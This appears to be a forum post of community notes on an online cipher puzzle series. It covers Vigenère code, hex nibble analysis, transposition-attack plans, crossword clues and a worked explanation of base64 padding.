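        shift = ord(key[i % len(key)]) - ord('A')
        if decrypt:
            shift = -shift
        out.append(chr((ord(ch) - ord('A') + shift) % 26 + ord('A')))
    return ''.join(out)

# The textbook example: ATTACKATDAWN under key LEMON
assert vigenere('ATTACKATDAWN', 'LEMON') == 'LXFOPVEFRNHR'
assert vigenere('LXFOPVEFRNHR', 'LEMON', decrypt=True) == 'ATTACKATDAWN'
```

Autokey, Beaufort and running key are all small variations on this loop (key extended with the plaintext, shift reversed, key as long as the message), so one implementation covers a chunk of the candidate list.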

- This one seems to be a variation of the f04cb algorithm.
- If we arrange the characters into columns every 3 bytes we get:
    3d 41 74
    3c 42 73
    38 43 73
    3a 43 71
    36 40 72
    36 45 76
    3c 40 76
    3d 47 78
    35 a9 75
    38 41 71
    39 a3 74
    35 41 71
    39 a5 78
    35 a9 77
    35 42 77
    39 a5 72
    3d 42 76
    3a 44 5a
    39 a6 73
    36 40 76
    3a 48 74
    36 40 74
    37
- All characters in the left column start with 3 (0011)
- Almost all characters in the middle column start with 4 (0100)
- Almost all characters in the right column start with 7 (0111)
- The fact that it's *almost* all points to an operation applied to the characters (like a xor), not to half-bytes simply being inserted between half-bytes
- It is impossible to represent more than 16 characters with half a byte. This means that, if a xor was the last operation applied, you can't know in advance where the 0s and 1s in the first half of each byte will end up. You could have some sort of one time pad engineered to produce this result, but that seems unlikely
- The characters that don't follow the pattern could correspond to special characters (like \r, \n, \t,...)
- Since 3 seems to have some sort of significance, it could be that the operations are done to groups of 3 bits (or 6, 13, pick a number!)
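The column observation above can be checked mechanically. This sketch tallies the high nibble of each 3-byte column using the hex dump from this message:

```python
from collections import Counter

hexdump = ("3d 41 74 3c 42 73 38 43 73 3a 43 71 36 40 72 36 45 76 "
           "3c 40 76 3d 47 78 35 a9 75 38 41 71 39 a3 74 35 41 71 "
           "39 a5 78 35 a9 77 35 42 77 39 a5 72 3d 42 76 3a 44 5a "
           "39 a6 73 36 40 76 3a 48 74 36 40 74 37")
data = bytes.fromhex(hexdump.replace(' ', ''))

# Group the bytes into 3 columns and tally the high nibble of each column
columns = [Counter(), Counter(), Counter()]
for i, b in enumerate(data):
    columns[i % 3][b >> 4] += 1

for col, counts in enumerate(columns):
    print(f"column {col}: {counts.most_common()}")
```

The most common high nibbles come out as 3, 4 and 7, with the a9/a3/a5/a6 outliers showing up only in the middle column and 5a only in the right one, which matches the observation above.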

welcome to our new home
- Just a text. 23 characters long if we take the spaces into account

- Not your typical Lorem Ipsum. It starts with the standard "Lorem ipsum" but then changes.
- All the words in the post seem to be in the original post. Maybe this is a clue for the code.
- Maybe the text can be translated into numbers according to the place of each word in the original text (first occurrence). Then maybe those numbers can be used for something. Maybe.
- The tree in the title may be a clue to use the stockwood program
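That first-occurrence idea can be sketched in a few lines. The words and text below are toy placeholders, not the actual post:

```python
def words_to_indices(scrambled: str, original: str) -> list:
    """Map each word of the scrambled text to the 1-based position of its
    first occurrence in the original text (None if it never appears)."""
    first_seen = {}
    for pos, w in enumerate(original.lower().split(), start=1):
        first_seen.setdefault(w, pos)
    return [first_seen.get(w.lower()) for w in scrambled.split()]

# Toy example (NOT the real Lorem Ipsum post):
orig = "lorem ipsum dolor sit amet lorem sed"
assert words_to_indices("dolor lorem amet", orig) == [3, 1, 5]
```

If the resulting numbers mean anything, they could then be fed into something like the stockwood program or used as transposition keys.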

- As with all images, check with outguess or similar tools
- Original image ->

- The text seems to be some dummy text
- You can check this by searching for example "Gi tractare ut ex concilia" in google
- Where this text comes from is unknown
- A longer version ->
- Another reference to oocities
- The text is from Kafka's Metamorphosis ->
- It also seems to be used as dummy text for html templates

- Crossword picture. Could this be used as a template for letters in some of the previous text?
- Following are the clues with the length of each word in the crosswords
3 The OG (6)
5 Lake (4)
10 Brookfeld (3)
12 The first coming (14)
14 The Great SF64 (4)
15 Moose (8)
16 Prefix and begin (3)
17 Justic (4)
1 Ema (5)
2 VolumeX (9)
4 Fasttrack (3)
6 Meet You There (5)
7 Frame (10)
8 The Lost (7 or 6)
9 Pursuit (7 or 6)
11 Microphone (4)
12 IceRen (5)
13 Jacket (4)
- Please check that the words have been transcribed correctly

- Looks like one of those transposition + substitution ciphers I heard so much about...
- That EAW: does it have something to do with the Ema of the creations_puzzle.jpg?
+ How to attack
- Get frequencies of letters and bigrams
- Get the Index of Coincidence
- Depending on what comes out cry or attempt something different
- First, try key sizes of 6 and 13 as they seem to be important numbers
- Try to guess some of the words that can be there. The longer the better!
- When that fails, curl into the fetal position and keep crying.
- A program?
    // # # # # # # #  y=0
    // # # . . . # #  y=1
    // # # . . . . #  y=2
    // # . . . . . #  y=3
    // # # . . . . #  y=4
    // # # . . . # #  y=5
    // # # # # # # #  y=6
    x2 = x - 1 + ((y + FirstShift) % 2);
    x3 = x + ((y + FirstShift) % 2);
- If % represents modulo, then the second term can only be 0 or 1
- x3 = x2 + 1
- There is also a list of numbers and a sentence
- Is the reference a shady reference to cicada?
- Is it a reference to one of the spinoffs of cicada?

- Charset (24): _'ABCDEFGHIKLMNOPRSTUVWY (the _ represents the space)
- It's 143 characters long. 143 = 13*11
- The IC matches that of English, so it could be that only transposition has been used
- Individual frequencies also match those of English (more or less, but good enough for such a small text)
- At least it's a double transposition (maybe more)
- There are 24 spaces, which suggests that the sentence is 25 words long
- The presence of ' indicates that there is a n't or 's (are there more possibilities?)
- We don't know the key size.
- Key lengths -> first I'll try 13 13, 6 13, 13 6, 4 20, 20 4 and see what happens
- Maybe the key is in one of the previous messages with long strings or even the jungle book one
+ How to attack?
- Assuming this is a double transposition, follow this -> chapter 5.3.1 (page 68)
- If it's more than double transposition, I think the same attack vector still holds
- Check also William Friedman's literature on the subject

- Here is the reference to 1976. It could be a reference to the paper by Diffie and Hellman
- All strings are 8 chars long except for the first and the last (6)

- No idea. Has a comment that looks like a perl script. Haven't tried to run it (it would need a couple of files)

I'm going to add a small explanation of baseN numbers
What is baseN?
In base32, base64, base10,... the base is just the number of different characters you use to represent a number.
For example
    base10    base2    base16
    12        1100     0xc

This can be interpreted as:
    12   -> 1 * 10^1 + 2 * 10^0
    1100 -> 1 * 2^3 + 1 * 2^2 + 0 * 2^1 + 0 * 2^0
    0xc  -> c * 16^0
In the case of base 16 we need more characters than just the numbers from 0-9 so we use a-f for the 10-15 range. In this example c = 12.
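Python's built-in base conversions confirm the example:

```python
# The three representations above all denote the same number
assert int('12', 10) == int('1100', 2) == int('0xc', 16) == 12

# Going the other way with the built-in formatters
assert bin(12) == '0b1100'
assert hex(12) == '0xc'
```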
This is the basic idea. However, when you check the standard base64 implementations you can see that the encoded string sometimes has padding characters (=). This is a consequence of how bytes are encoded into base64 to optimize the performance of the algorithm. In the standard case, each character of the base64 alphabet represents a value from 0 (binary 000000) to 63 (binary 111111).
So when you encode a string like MESSAGE to base64 first you transform it into bits:
    M        E        S        S        A        G        E
    01001101 01000101 01010011 01010011 01000001 01000111 01000101
Then, group them into 6bit numbers:
 >> 010011 010100 010101 010011 010100 110100 000101 000111 010001 01 
We need to add 4 zeros to complete the last 6-bit group. To indicate this we append two = chars to the end of the string
 >> 010011 010100 010101 010011 010100 110100 000101 000111 010001 010000 
If we encode this according to the base64 value table we get:
    010011 010100 010101 010011 010100 110100 000101 000111 010001 010000
    T      U      V      T      U      0      F      H      R      Q      ==
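The whole walkthrough can be checked against the standard library implementation:

```python
import base64

# Reproduce the MESSAGE example from above
encoded = base64.b64encode(b'MESSAGE')
assert encoded == b'TUVTU0FHRQ=='

# And the padding makes it round-trip cleanly
assert base64.b64decode(encoded) == b'MESSAGE'
```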

submitted by averagetheposter to whatisada387
